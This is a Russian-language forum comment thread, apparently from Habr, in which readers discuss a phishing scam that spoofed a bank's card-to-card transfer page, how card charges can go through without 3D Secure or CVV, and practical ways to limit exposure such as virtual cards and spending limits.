        Вообще, это банальный фишинг, щедро приправленный бестолковой защитой карты. Печально всё это.
        • +2
          «Я так и не понял, зачем вообще что-то куда-то встраивать, если можно тупо украсть код и «на той стороне» всё отправить?»

          Это мне вопрос? Думаю, чтобы не замарачиваться с подменой IP при множественных переводах с разных карт на одну.
          • +3
            На карту, видимо, без подтверждения 3D Secure проблематично отправить, если вообще возможно. Покупатель сам вводит код подтверждения. Иногда по несколько раз. И после человек может в течение нескольких дней даже не подозревать, что его обманули. Если дополнительная активность по карте не проявится, то покупатель авиабилетов может узнать о мошеннических действиях со своей картой даже в аэропорту. Чем быстрее жертва мошенников заявит в свой банк, тем больше шансов аннулировать транзакцию и, возможно, даже найти следы мошенников. А через неделю шансы что-то найти и вернуть снижаются очень сильно.
            И еще, если кто-то перехватил данные карты, чтобы перевести деньги на другую карту, ему нужно с какого-то компьютера выходить в сеть, набивать намера итп. При массовых переводах скорее всего останутся следы. А если покупатель сам перевод осуществляет, то в логах платежных систем ничего нет, — IP мошенников нигде не записываются. Единственная зацепка — это веб сайт мошенников.
            Один раз автоматизировал все — и пошел отдыхать.
            Возможно в этом причина.
            • +1
              «если кто-то перехватил данные карты, чтобы перевести деньги на другую карту, ему нужно с какого-то компьютера выходить в сеть, набивать намера итп.»

              Лично я понял из того, что вы написали в статье что именно так они и делали. Автоматизированная часть воровства заключалась только в первой транзакции, которая финансировала рекламную кампанию. Все остальное — вручную.
              • 0
                Судя по сумме — активировали какой-то автоплатёж. Возможно — сразу при транзакции.
              • +3
                Возможно, это и так. Только наоборот. Первая часть перевод на карту (т.е. себе в карман), а уже вторая и последующие часть на рекламную компанию. На рекламную компанию средств тратится больше, чем на вывод на карты. Причем ручная это работа во второй части или автоматизированная, тоже не известно. По крайней мере на частично автоматизированную похожа.

                Пока остатка хватало, списания были с интервалом ровно в 10 минут. А как точно заметил Stryker86 в одном из комментариев, суммы списания кратны изначальной сумме 5900 р (11800, 17700, 23600). Совпадение? Не думаю.
        • –3
          > тупо украсть код

          Если вы про код из смс, то он одноразовый и высылается по смс только после заполнения всех форм и нажатия кнопки «ок».
          Его нельзя украсть, его можно только обманом узнать у пользователя.
      • +2
        Там фреймов нету, есть клиент-серверная прокладка.
        Но в итоге браузер шлёт запрос серверу Тинькова? И у запроса можно проверить referrer.
        • 0
          «Но в итоге браузер шлёт запрос серверу Тинькова?»

          Думаю, да. Там ведь куча скриптов от оригинальной страницы p2p перевода. Зачем еще тебе нужны чужие работающие скрипты?

          «И у запроса можно проверить referrer.»

          Вас хоть сколько-нибудь удивит если в этой истории окажется, что они НЕ проверяют referrer?
          • 0
            referrer заполняется отсылающей стороной, сервер его получает в готовом виде от клиента. Подделывается легко.
        • +11
          В итоге сервер злоумышленника шлет запрос серверу Тинькова.
    • 0
      Вы невнимательно читали статью.
      Причем здесь используется не окно iframe.
    • +2
      Да и ни один современный браузер не даст джаваскрипту изменять код в iframe стороннего сайта (напр. вписать номер карты получателя), даже при отсутствии заголовка X-Frame-Options, только ввод самого пользователя. SOP однако…
    • +1
      Они и не дают. Эти халтурщики даже поленились распарсить страницу с сайта Тинькова и отдавать клиенту только необходимые данные, а, видимо, просто регулярным выражением добавляют display: none в необходимые блоки.
      • +3
        Они даже поленились поставить препроцессор на стороне сервера. Всё на стороне клиента происходит.
    • +5
      Я думаю это скорее реклама AdBlock. Или еще один повод вырезать Яндекс.Директ…
      Сори, веткой ошибся…
  • 0
    Мне тоже не понятно как без подтверждения смс они смогли списывать суммы. Да и почему бы лишние деньги на карте не скидывать в какой-нибудь вклад, накопительный счет или сделать карту у которой свой счет, не привязанный к основному.
    • +2
      Recurring payments. Во многих сервисах так (где предусмотрена абонентская плата): достаточно один раз заплатить, а дальше та же сумма будет регулярно сниматься без вашего участия.

      В данном случае, правда, суммы были разные, но технически это возможно.
      • 0
        но был же платеж на карту просто? У сбера вроде такие вещи можно только через кабинет делать, или нет?
        • +2
          Про сбер не знаю, пользуюсь другой картой.

          Но своему провайдеру и компании Blizzard я именно так и плачу — единожды ввёл на их сайте данные карты (и код из СМС), а они дальше ежемесячно сами списывают с неё абонентскую плату.
          • 0
            Гугл так же сам ежемесячно списывает оплату своих сервисов.
          • 0
            DEL
          • 0
            У Близзов уровень доверия у визы/мастеркарда овер 9000, так что им можно. У амазона и годэдди тоже самое — им достаточно только номер кредитки, всё остальное не проверяется, даже дата и CVC.
      • +2
        Аналогично у PlayStation®Store. Люди, оплатившие с зарплатной карты, часто там страдают от автоматического списания, покупок игр с консоли.
        • 0
          Там только продление подписки ПСН автоматическое (которое можно отключить), все остальное проходит через ваш пароль и тысячу вопросов…
          • +1
            а WoW когда-то вообще не парясь карту высасывал.
          • +1
            Если карта привязана к аккаунту, то покупка совершалась (два года назад) тихо без вопросов. Было очень актуально, когда крали аккаунты — успевали купить на этом аккаунте на солидные суммы, пока пользователь успевал понять и заблокировать зарплатную карту.
          • +1
            У меня при покупке игр, как в Стиме, так и в ПСН ничего не требует. Убер, тот же, списывает не спрашивая.
            • 0
              Алиэкспресс ничего не требует, списывает просто по кнопке «Купить». Правда, для этого нужно предварительно привязать карту к своему аккаунту :)
              • –1
                Gearbest — оплачиваю через PayPal с привязанной картой от сбера, тоже ничего не спрашивает.
                • +1
                  Так тут жирбест не при чем, все данные есть у пэяпэла, им на любом сайте оплачивайте и ничего спрашивать не будут
            • 0
              у меня Стим всегда требует CVC2-код карты.
              а вот Amazon ( магазин), Apple (и AppStore и iTunes Store), Google Play — спокойно с привязанных карт списывают вообще без всяких вопросов относительно карты.
          • 0
            Нет. У меня пару раз было, что они автоматически какие-то игры покупали за меня. Не знаю, баг это или что.

            Хорошо хоть, по запросу в таких случаях они деньги возвращали всегда.
      • +15
        Заметил, что суммы списания в статье кратны изначальной сумме 5900 р (11800, 17700, 23600)…
        • +6
          А вам случайно не кажется скучным, и непримечательным число 1729?
          • +1
            Рамануджан, перелогиньтесь.
        • 0
          Интересное наблюдение про кратность сумм 5900-11800-17700-23600. Спасибо.
          • +21
            НДС 18% :)
            5 000 + 18% = 5 900
            10 000 + 18 % = 11 800
            15 000 + 18% = 17 700
            20 000 + 18% = 23 600
      • 0
        В результате обманных действий покупатель подтвердил отправку денег на чью-то карту, а скорее всего на две разных. Если бы регулярная отправка была на эти же карты, то это может быть похоже на то, о чем Вы пишите. Но регулярная отправка включилась как раз совсем на другого получателя, на которого покупатель согласия не давал даже по ошибке.
    • +3
      На карте всего было 40 тысяч рублей. Что же нужно держать на карте по пять тысяч рублей и постоянно гонять деньги туда-сюда? Мороки слишком много.

      Алиэкспресс списывает деньги тоже без всяких смс.
      • +6
        > Что же нужно держать на карте по пять тысяч рублей
        Если нет желания когда-нибудь писать десятки заявлений-жалоб-требований вернуть деньги, подобные посты на хабре и в итоге все-равно остаться без денег, то да — на активной карте, которую вы светите в интернете, в кафе и магазинах в любой момент времени должна быть только сумма, потерю которой вы переживете не сильно расстроившись.
        • +1
          И всё равно нужно писать заявление, а то «не сильно расстраиваться» придётся постоянно.
        • 0
          Собственно у Тинькова можно выпустить 5 доп карт установить там лимиты и пользоваться ими, а основную хранить под замком.
        • +1
          Как быть с кредиткой? Первести с неё на другую — вылет из грейса. Платить по дебетовке — туда надо ещё деньги сначала где-то взять, чтобы положить.
          • 0
            С кредиткой вообще плохо — с неё такими методами могут наснимать денег до выборки лимита по кредиту.
            • 0
              Успокаивает то, что там грейс и вообще деньги не мои. Пусть докажут, что я их взял.
              • 0
                Всё равно неприятно. И возможна блокировка счёта на период выяснений.
          • 0
            Если так неймется платить кредиткой в интернетах, возможны 2 варианта навскидку:

            1. Выпустить вторую карту к счету и установить по ней лимиты жесткие.
            2. Если банк хреновый и не позволяет такого сделать, установить лимит на операции в интернете 0р, перед покупкой ставить нужный лимит, после покупки опять устанавливать в 0р.
            • +1
              Не то, чтобы неймётся, но там кешбек 3%, да и не надо делать лишние движения по поводу её пополнения.
              Лимиты не совсем удобно: всякие автоплатежи на сотовые, интернет будут блокированы.
              У меня для расходов на машинку дебетовка с 5% каши — а свободных денег не так уж много, приходиться безконца бабки тусовать с одной карты на другую, по мере их появления, очень неудобно: заезжаешь на АЗС и хлопаешь себя по лбу, что на карте рублей 300, а надо на 50 литров. Запускаешь браузер в телефоне и давай туда-сюда по c2c деньги гонять, благо что бесплатно.
              • 0
                А в чем беда установить лимит на платежи через инет в 1000р в месяц? Или во сколько там вам автоплатежи за интернет с сотовым обходятся? Даже если хулиганы упрут данные карты, много вы не потеряете.
              • 0
                Немного оффтопика — а можно подробнее про 3% и 5% кэшбека? Это где такое?
                • 0
                  Бинбанк, там в выбранной категории — 5%, у меня категория авто: АЗС, запчасти, сервисы, мойки.
                  Можно активировать категорию покупки в интернете. Но все квазикеш операции типа пополнения яндекс-денег и киви кошелька — мимо.
                  Кукуруза — 3% фантиками, можно потратить в перекрёстке на 30% чека, в Евросети 99%. Раньше было ТНК — я в 15-м году в отпуск на машине ездил, слил на 8000Р бензина бонусами(больше просто не успел), ещё там же купил огнетушитель, трос и промывку инжектора(как я и предполагал — хрень оказалась, но за бонусы не жалко).
                • 0
                  Разные банки разные проценты кэшбэка предлагают. Во многих банках есть кэшбэк с высокой ставкой на какую-то отдельную категорию. Многие из этих банков придумывают разные хитрости, чтобы клиентам было как можно сложнее воспользоваться повышенной ставкой. Эти хитрости могут заключаться в том, что категория товаров каждый месяц или каждый квартал меняется. Поэтому клиенту банка трудно просчитать заранее, как получить максимальный кэшбэк. А читать новости, рассылки итп с сообщениями, какая сейчас категория товаров у банка в почете, это очень утомительно. Есть еще банки, которые не сразу начисляют кэшбек, а просят в личном кабинете по каждой операции делать отметку, что она попадает под условия акции итп.

                  Я знаю один банк, который не морочит клиентам голову со сложными условиями — Бинбанк. Возможно есть и другие такие же. Но из тех, что на виду, таких простых условий не встречал. Кэшбек 1% на обычные покупки, 5% на одну из пяти категорий, которую сам клиент выбирает. При этом категория со временем без участия клиента не меняется. Самая интересная категория — интернет-покупки. Если ее выбрать, то при покупке в интернет-магазинах будет кэшбэк 5%.

                  Единственное, стоит иметь в виду, интернет-магазины принимают платежи по-разному и возможна ситуация при которой ни 1%, ни 5% ни зачислят при покупке. Для примера, один из самых крупных компьютерных интернет-магазинов принимает платежи по картам через сервис Яндекс.Деньги. При покупке в этом магазине кэшбек не зачисляют. Вероятно для банка такая покупка выглядит, как пополнение кошелька Яндекс.Денег или что-то похожее. А за пополнение кошельков итп кэшбек не начисляют. Клиент при оплате картой разницу не замечает, а для банка разница есть. Поэтому перед оплатой нужно смотреть, как интернет-магазин принимает платежи по картам. Если прием платежей организован через банки эквайеры, кэшбек 5% точно начистят, в остальных случаях, как повезет.
                  • +1
                    Что за загадки «один из самых крупных компьютерных интернет-магазинов»? Почему нельзя сразу прямо написать название, к чему эта недосказанность?
                    • 0
                      При написании комментария я прямо написал название этого магазина. Но при предпросмотре обратил внимание, что движок этого сайта название вырезал. Поэтому пришлось переписать фразу.
                      • –1
                        Публика всё ещё с нетерпением ждёт.
          • 0
            А можно управлять суточными лимитами.
            Лайфхак «от бывалого»
            Заводится несколько допкарт для разных целей. Для постоянного ношения с собой: лимит на операции в месяц + лимит на снятие наличных в сутки. В интернете не светится. Для трат в интернете: минимальный лимит на операции в месяц, минимальный лимит на снятие. Перед оплатой лимит на операции поднимается на размер операции. Через мобильный банк это делается за 2 минуты.
            При этом не важно — карта кредитная или дебетовая.
      • +2
        > Что же нужно держать на карте по пять тысяч рублей
        > и постоянно гонять деньги туда-сюда? Мороки слишком много.

        * Держать на карте нужно ноль и непосредственно перед покупкой
        переводить на карту нужную сумму. Дело пары минут.

        * Выделенная карта для интернет покупок.

        * Ну и покупать билеты не у посредников, а на сайте авиакомпании.
        • +1
          Именно так. Причем многие банки позволяют выпустить виртуальные карты, без «пластика» как раз для оплаты в разного рода онлайн-сервисах. А закинуть денег с карты на карту дело пары минут.

          Это предотвратит дальнейшее списание, но за мошеннические «билеты» деньги все равно уведут. Тут только разбираться с банком об отмене перевода.
          • +1
            Не знаю, как у других, но в Альфа банке выпуск виртуальных карт был платный и жили они всего два месяца. Дорого и неудобно. Проще и дешевле выпустить для таких целей реальный пластик.
            • 0
              Не совсем так. Есть у Альфы Мастеркард виртуал в пластике со сроком 2 года.
              • +1
                Если он в пластике, то что же в нём виртуального?
                • +2
                  У него нет чипа, магнитной полосы и эмбоссирования.
                  • +5

                    А зачем тогда нужна непонятная пластмассовая хрень?

                    • +2
                      на ней номер написан :)
                      не знаю, может у банков есть какие-то внутренние требования по этому поводу, но в интернет-банке этот номер не виден, и передать сотрудники банка мне его могут исключительно в виде пластмассовой хрени
                      • +1
                        В России нет таких требований. У меня часть номера виртуальной карты видно в интернет-банкинге, а другая часть пришла в виде СМС, вместе с датой с CVV.
                        • +1
                          У нас КазКоммерцБанк позволяет через интернет-банкинг открыть сколько угодно мультивалютных виртуальных карт сроком на 10 лет за символические 1 тенге, но с комиссией в 1% за любой платеж.
                          Имея такую возможность каждый раз удивляюсь тем кто привязывает к разным интернет аккаунтам зарплатную карту.
                          • +1
                            Вот только у других банков за оплату в интернете идёт кэшбэк от 1 до 3%, а не снятие комиссии в 1%.
            • +2
              QIWI, Яндекс.Деньги позволяют выпустить виртуальную карту за секунды. Закрыть ее и/или перевыпустить можно в любой момент. QIWI, кроме того, позволяет выпустить непополняемую «одноразовую» виртуальную карту. Т.е. если просто уделить некоторое внимание вопросу и посмотреть чуть шире, то окажется, что фраза «проще и дешевле выпустить для таких целей реальный пластик» не имеет под собой оснований.
              • +1
                Не все пользуются QIWI и YM. Лично я — даже не собираюсь. Особенно, QIWI.
                • +1
                  Ну так соберитесь. ;)
                  • 0
                    QIWI славна тем, что сама любит списывать деньги со счета, если их сервисом долго не пользоваться.
                    • 0
                      А еще, вот этим: https://habrahabr.ru/post/193554/
                      • 0
                        Факапы могут случиться у каждого. Про Wells Fargo слышали? Не чета QIWI, с какой стороны ни посмотри. А вот ведь: http://finview.ru/2016/09/09/zerohedge-com-3-65/
                    • 0
                      Ну как бы мы говорим об использовании сервиса исключительно в качестве «прокладки» — для кратковременного хранения средств, предназначенных для оплаты в интернете. Т.е. это инструмент такой, в сценарии использования которого для нашей цели ситуаций «если долго не пользоваться» быть не может по определению.

                      Кроме того, МегаФон, например, тоже славен тем, что через полгода (или другой срок, не помню) неиспользования номера включается ежемесячное списание определенной суммы. И что? Вы не используете МегаФон? Без проблем. ;) Но я — использую уже лет 12 где-то и не планирую пока отказываться. Просто если номер мне не нужен — я убираю с него деньги и закрываю.

                      Мне как бы не с руки агитировать и рекламировать сервис, особенно вне рамок обсуждаемого сценария использования, но коль вы уж привели аргумент, то и я тоже приведу — я использую QIWI в качестве основного платежного средства, с виртуальными картами, с реальным пластиком (который уже перевыпускал дважды), т.е. достаточно долго, лет 5-6. И я искренне не понимаю смысла вашего аргумента, поскольку QIWI — не депозит, денег там хранить не нужно, а тем более, долгое время и не используя. Могу «сыграть на вашей стороне» и подкинуть еще аргументов — например, если вы перестали пользоваться номером, то через какое-то время, после отлеживания, оператор его продаст другому абоненту, который, таким образом, получит доступ к вашему QIWI-кошельку. Это так? Абсолютно. Это имеет какое-то значение для меня, как пользователя? Нет, если я не идиот, извините.

                      Понимаете, если, например, не пользоваться долго автомобилем, то у него рано или поздно спускают шины, садится аккумулятор, рассыхаются резинки в подвеске, «протухает» масло в двигателе и ржавеет кузов. Через 3-5 лет — это уже не автомобиль, а труп. Следует ли отсюда, что нам теперь не стОит покупать автомобили? ;) Да, следует — в том случае, если вы не собираетесь на них ездить, а собираетесь сгноить на стоянке.
              • 0
                Проблему дальнейших списаний это решит, а вот с кем разбираться в случае мошеннической покупки, как в случае с товарищем автора. Как мне кажется — QIWI и ЯДеньги достаточно мутные конторы в плане ответственности перед законодательством. Хотя я интересовался данными системами достаточно давно и уже долгое время не слежу за развитием ситуации. Может быть что-то и изменилось.
                • 0
                  Не более мутные, чем банки за пределами первой десятки.
                  • 0
                    Возможно. Привык к Сберу и Возрождению. С остальными банками почти не пересекаюсь.
                • 0
                  Мутные-то мутные, но в качестве промежуточной прокладки вполне годятся.
                  Нельзя списать со счёта больше чем на нём есть
                  • 0
                    Вообще то в некоторых случаях можно. Технический овердрафт. Сама возможность связана с тем что списание с карты идет как бы в два этапа — авторизация (сразу) и непосредственно списание (через несколько дней но может быть до месяцев) и при этом:
                    — могут отличаться курсы на эти моменты.
                    — существуют (не касается обычно Интернета) операции когда просто приходит списание и банк обязан списать, да — загоняя карту в минус если надо
                    — существуют операции (обычно не в России) когда и авторизация и списание приходят с задержкой. если денег нет — будет теховердрафт.

                    А еще существует такой банк как Сбербанк, за которым замечалось устройство теховедрафта (именно теховердрафта а не блокировки) по просьбе приставов
          • 0
            Можно оплачивать через яндекс деньги с привязанной картой, которую можно легко отвязать и не засвечивать банковскую. Я к тому же привязал специальную карту для расчетов со своим счетом.
            • 0
              Я вообще не привязывал, просто ручками перекидываю нужную сумму
        • 0
          Билеты у посредников иногда дешевле, чем на сайте авиакомпании. Редко, но бывает.
          • 0
            Перед сезонами заметно — авиакомпании поднимают цены, а посредники уже выкупили кучу мест и торгуют ими по ценам ниже авиакомпаний, но значительно дороже чем покупали. Плюс скидки за опт. Вывод — покупать билеты надо либо сильно заранее, либо в день вылета (на горящие билеты часто скидки). Хотя в последнее время цены на сезонные билеты авиакомпании держат весь год.
            • 0
              В день вылета покупать не вариант, если направление популярное.
              • 0
                Тут от многих факторов зависит. В любом случае перед покупкой вопрос надо обстоятельно изучать.
        • 0
          я например для этой цели пользуюсь виртуальной картой Яндекс Денег. Именно дня онлайн покупок. А на нее кладу нужную сумму со сберовской карты через СБ-онлайн. дело 1 минуты.
        • 0
          Так же можно было купить тикеты в онлайнБанкинге у Сбербанка. но увы, кто-то погнался за дешевизною. Итог, очень печален.
      • 0
        1. Использую физические карты для держания валюты (карты с собой не таскаю), еще есть именная карта в гривне (конвертирую в 5-10К гривен в месяц для растрат). Для оплаты в интернет есть электронные (виртуальные) карты на которые, при необходимости перевожу с реальных карт деньги.

        2. Меняйте банк.
    • +3
      Похоже так же как списывает Amazon, Microsoft и кстати Aliexpress(но в последнем карта по дефолту к счёту не привязывается).
      Достаточно один раз оплатить и за продление услуг будут списывать постоянно и без подтверждения через 3D Secure/Verified by Visa.
      Для себя нашел выход из подобных ситуаций при работе с подобными сервисами:
      Указывать дебетовую карту с отключенными кредитными/овердрафтовыми «фишками» и пополнять карту непосредственно перед оплатой(т.е. по получению уведомления об отключении сервиса) на требующуюся для оплаты сервиса сумму и не монетой больше.
      • +1
        + adobe еще
      • +4
        Amazon у меня списал деньги без CVV кода и без 3D Secure, просто по номеру карты
        • –2
          да вы что? и без экспайра и cvv?
          • +5
            C «экспайром» и без cvv.
            • 0
              Занятно. Я не знал, что можно без cvv.

              Получается, для платежа достаточно фото передней части карты.
              • 0
                Я тоже удивился, даже уточнял в поддержке, и это при том, что заказывал я на адрес посредника.
                • 0
                  И вот как теперь, зная об этом, расплачиваться картой в магазинах, где обязательно нужно передать её кассиру?
                  • 0
                    Даже не обязательно её кому-то давать. Современные камеры вполне могут помочь рассмотреть все надписи на карте, а карточка, обмотанная изолентой, боюсь, не сможет работать в картоприёмниках.
                    • 0
                      Ну, когда карта в у владельца в руках, её можно прикрывать ладонью, ещё как-то мешать камерам.
                      Но в целом я соглашусь — камеры помогают мошенникам.
                    • 0
                      Вы можете стереть cvv код, а хранить его где то в другом месте а не прямо на карте. Или запомнить — пин код же помните, а тут всего три цифры. Остальное стереть сложней, но хоть cvv надо то удалить
                      • 0
                        Так суть то в том, что cvv не везде нужен.
                        • 0
                          Ну без cvv Вы все таки ощутимо усложняете злоумышленнику задачу снятия денег с кредитки.
      • 0
        На Aliexpress оплата идет через AliPay — там то и хранится информация о Вас и Вашей карте. Не знаю как сейчас, но AliPay спрашивает иногда месяц, год и CVV/CVC карты. А если оплачивать через мобильное приложение Aliexress, то, если не ошибаюсь, вообще ничего не спрашивает.
        • 0
          Так речь не о данных карты. А об одноразовых смс паролях.
          • 0
            Сегодня платил на Али — не пришла смс с кодом из банка, а 3dsec включен.
            • 0
              а спросите в банке как они отреагируют если в ответ на запрос 3D Secure от экваера придет ответ что не поддерживается, давайте в обычном режиме? судя по описанию — согласятся провести в обычном режиме. Но имеют право и отказать. Могут другие лимиты применить.
              Как пример:
              — Укрсиббанк https://my.ukrsibbank.com/ru/personal/questions/card_limits/
              — Казахстанского Альфа-Банка http://www.alfabank.kz/ru/retail/cards/restrictions
              лимиты на операции без 3D Secure — 0

              вот Российских банков где есть такое — я не знаю.
            • 0
              Именно.
              Сам сегодня платил на Али, дважды. Первый раз с PC, перед этим «привязав» карту к AliPay (+месяц, год, CVV/CVC-код тоже указал).
              Второй раз платил через мобильное приложение. Там ничего указывать вообще не пришлось. Даже никакого секретного кода. Тут вижу два варианта решения: либо лочить смартфон настолько, насколько веришь во все эти экраны защиты, либо через АлиПей (да и вообще любые интернет-платежи проводить) через спец-карту, перекидывая туда средства за 1-2 минуты. У Тинькова в этом плане очень удобно.
            • 0
              Насколько знаю, 3d Secure должен запрашивать магазин-продавец. Если не запрашивает, банк проведёт операцию без него.
              Я интересовался в банке А по поводу возможности отключить платежи без 3D Secure для моей карты. Сказали, что невозможно технически.
      • 0
        + разные регистраторы доменов, для продления могут списать автоматом, не спрашивая ничего дополнительно
    • +3
      Так вроде же на 3D-S настаивает не банк, который выпустил карту, а платёжная система, через которую происходит оплата. Есть сайты где смс попросят ввести, есть сайты где этого не требуется.
      • 0
        Допускаю, что это так и есть. В смс от Сбербанка, в списаниях было указано «YM*Yandex.Direct» Если предположить, что платежный посредник решает, требовать ли код подтверждения, то, как я писал в статье, возникают вопросы либо к Yandex.Money, либо к Yandex.Direct.
      • 0
        Подтверждаю. Имел дело с гейтом от Payeezy, там настройка 3D secure опциональна. Тоже был удивлен и техподдержка моего банка сказала что да, оплата возможна и без смс.
      • +1
        Мне в банке подтвердили, что 3D-secure не на их стороне, и деньги можно и без него списать, как захочет тот, что снимает деньги. ИМХО это вообще бред и смысла я тогда не вижу в такой технологии.

        Более того, я пару раз в магазине вводил неверный пинкод, о чём мне сообщал терминал, но там была возможность продолжить. Нажимая Да, я завершал покупку не вводя повторно пинкод. Деньги снимались.
        Один раз вообще дал сыну карту и попросил его так оплатить покупку и он это сделал. После чего я позвонил в Росевробанк и попросил объяснить эту ситуацию. Сказали, что до 4000 может не требоваться ввод пинкода.
        Ужасно всё это.
        • 0
          нажимая отмену, выполняется оплата по подписи. Допустимо при не очень больших суммах и при не-запрете оплаты по подписи банком. Чеки при этом обычно различаются, «введен пин-код» и «подпись клиента».
        • 0
          Не обязательно ошибаться при вводе даже. Обычно достаточно нажать «отмена» на первое предложение терминала ввести пин-код и оплата пройдет и без него.
          Правда не всегда(но чаще всего ОК), обычно на небольшие суммы (большая не пройдет) и по-идее в этом случае кассир должен потребовать поставить подпись на чеке.
          Но я последнее время при покупках до 1-2 тыс. руб оплачиваю и без пинкода и без подписи — все проходит и так, кассиры на подпись или забивают или вообще не соображают что нужно ее запрашивать…

          А на случай подобной жести как в статье просто не держу существенных сумм на расчетной карте — только на текущие мелкие расходы. Или закидываю через ИБ непосредственно перед более крупной покупкой нужную сумму.
    • 0
      Да сколько бы на счету денег не было. Это другая история. Не все банки имеют настройки безопасности, где можно ограничивать сумму списания через интернет банкинг или на снятие налички. Тут как и всегда действует правило «предупрежден значит вооружен».
    • +6
      Проверка CVV и 3Dsecure — добрая воля мерчанта (магазина). С другой стороны, если владелец карты опротестовывает платёж, деньги ему тоже возвращает магазин, через который прошел платёж. В данном случае, это, очевидно, должен быть P2P-сервис, позволивший перевод.
      • +2
        При использовании 3dSecure в случае претензий пользователя мерчанту ничего не грозит, риски берет на себя банк или эквайринг (точно не знаю).
    • +5
      Мне тоже не понятно как без подтверждения смс они смогли списывать суммы.
      1. Злоумышленник регистрируется в любом сервисе, например, Яндекс.Деньгах, Amazon, Paypal, вводит свой номер мобильного телефона, если нужно.
      2. Привязывает карту человека, который ввел ее данные на фишинговом сайте, сделанным злоумышленником.
      3. СМС от сервиса приходит злоумышленнику, а СМС от банка о снятии и возврате средств для проверки работоспособности карты — владельцу карты.


      В крупных сервисах, которые привязывают карту к себе, обычно нет 3D Secure. Amazon вообще даже CVV/CVC2 не требует, только номер карты и срок действия. Большинство сервисов не проверяют введенное имя, я всегда ввожу DICK BUTT, получал только один раз отказ.

      Вообще, безопасности оплаты картами в интернете застряла где-то в каменном веке. По возможности, платите только электронными деньгами. По моему мнению, Webmoney на голову выше конкурентов по безопасности и удобству использования: для подтверждения платежей не требуется принимать СМС или иметь мобильный телефон под рукой вообще — есть приложение E-Num, которое генерирует одноразовые коды, принимая на вход кошелек, которому переводятся средства, сумму, challenge-код. Входные данные прилетают либо через Push, либо их можно считать камерой с QR-кода на экране оплаты, либо вообще вручную ввести. И приложение есть под все платформы, даже под Symbian и Java оно до сих пор работоспособное, не говоря уже о Blackberry и Bada.
      • 0
        СМС от сервиса приходит злоумышленнику, а СМС от банка о снятии и возврате средств для проверки работоспособности карты — владельцу карты.

        Не знаю на счет всего, но чтобы подтвердить PayPal нужно ввести код из описания транзакции. Я этот код мог видеть только в клиент-банке, например.
        Электронные деньги мне кажутся весьма мутной темой, но оболочка над платежами вроде PayPal — отличная вещь. Проблема только в том, что далеко не все сайты его поддерживают.
        Ну и вообще небезопасность кредиток компенсируется относительной простотой возврата денег. Плюс банки научились неплохо так определять подозрительные транзакции. Да, это костыль, но всё же не стоит параноить сильно.
        • +5
          но оболочка над платежами вроде PayPal — отличная вещь. Проблема только в том, что далеко не все сайты его поддерживают.
          Он хорош для клиентов, но головная боль магазинов. По мнению Paypal, прав в большинстве случаев клиент, даже если клиент неправ. А еще Paypal берет процент с магазина за свои услуги.

          Ну и вообще небезопасность кредиток компенсируется относительной простотой возврата денег.
          Мне не нравится, что вообще существует возможность воспользоваться моей картой, если ее данные кому-то попали в руки. В случае с электронными деньгами, я всегда заранее знаю, кому и сколько я плачу, и нет возможности снять мои деньги без подтверждения с моей стороны.

          К тому же, у большинства банков уведомления об операциях с картой приходят только по СМС. Я телефоном пользуюсь редко, для меня это неважная вещь, и СМС я могу просто не увидеть, поэтому мне приходится писать скрипты для каждого банка отдельно, которые раз в 15 минут входят в интернет-банкинг, парсят страницу и отправляют уведомление по почте, если баланс изменился.
          Раньше у ВТБ24 были замечательные карты одноразовых кодов — безопасные, маленькие, не требующие канал связи и электричества — но их заменили на СМС-коды, которые ни разу не безопасны и требуют наличие телефона.
          • 0
            Абсолютной безопасности не существует. Мне вот тоже не понравилось бы, что кто-то пользуется наличностью из моего кошелька, но я не могу гарантировать 100-процентную сохранность этой наличности (ну, кроме варианта не использования её вообще). Так что мне кажется, что всё упирается в уровень вашей параноии по отношению к юзабилити.
          • 0
            > А еще Paypal берет процент с магазина за свои услуги.

            Это все берут. На этом и зарабатывают.
            • +1
              Webmoney берет 0.8% с отправителя, например. PayPal берет около 4%. Причем не только с магазина, попробуйте отправить деньги из страны в страну. А еще у них просто ужасный курс (для покупок это можно отключить, а для вывода уже нет).
              • 0
                При переводе денег палка спрашивает с кого списывать комиссию — с отправителя или получателя.
          • 0
            за 500 руб у них есть генераторы кодов, это отдельные устройства
            • 0
              Это устройство, увы, практически невозможно использовать в упомянутых автором предыдущего ответа скриптах. Сам мучаюсь :(
            • 0
              У меня были эти устройства. Два из трех сдохли (на экране просто целые строчки пропали так, что было невозможно понять, какая где цифра). Идея норм, физическое воплощение на три с минусом.
              • 0
                Аналогично. Первое уже сдохло хотя пользовался мало — может пару десятков максимум. Причем сдохло в последний месяц «гарантии» (в течении года обещают обменять бесплатно) — еле успел заменить.
          • 0
            У Авангарда есть карты одноразовых кодов до сих пор.
            Очень удобно. Особенно когда ты в роуминге где-нибудь в Анадыре.
            • 0
              У Авангарда вообще все круто организовано. У них целых 3 уровня управляемых динамически: СМС, карточки (физические) одноразовых кодов, ЭЦП.

              В зависимости от суммы и ситуации (вид операции, ее «подозрительности/рискованности» по внутреннему анализу банка) применяются разные методы. В простых случаях и небольшие сумму можно подтвердить СМС (или одноразовым кодом с карточки — на выбор что удобнее/больше нравится).

              Если сумма крупная или операция подозрительная — по СМС подтверждения приниматься не будут, можно подтвердить только более безопасным одноразовым кодом с карточки.

              А в особо тяжелых случаях (например ОЧЕНЬ крупную сумму через интернет перевести если до этого таких операций не проводил, т.е. для клиента они не характерны) затребуют связку СМС с телефона + одноразовый код с карточки + подписать ЭЦП(хранящейся на выдаваемом брелке-флешке). Могут еще и из СБ перезвонить на контактный номер и переспросить — действительно ли это клиент сам переводит, по собственному желанию и нет ли ошибок.
          • 0
            Сейчас у них есть какой-то приложение для смартов/планшетов для генерации кодов после установки работающее в офлайн режиме (т.е. без интернета или СМС). Правда не знаю можно ли покупки по карте ими подтверждать (их карточной для покупок никогда не пользовался), точно можно любые операции в ИБ ими подтверждать вместо СМС.

            Ну и за 500р есть полностью аппаратные генераторы одноразовых паролей. Хотя в данном случае генератор — это чип банковской карты, а устройство лишь внешний экран, клавиатура и источник энергии для работы чипа карточки.
      • +1
        Вообще, безопасности оплаты картами в интернете застряла где-то в каменном веке.

        Неа. На данный момент это компромис между безопасностью и удобством пользования.
        Хочется и чтобы не нужно было лишних манипуляций (пароли, смс-ки), и чтобы безопасно.
      • +7
        > Вообще, безопасности оплаты картами в интернете застряла где-то в каменном веке.

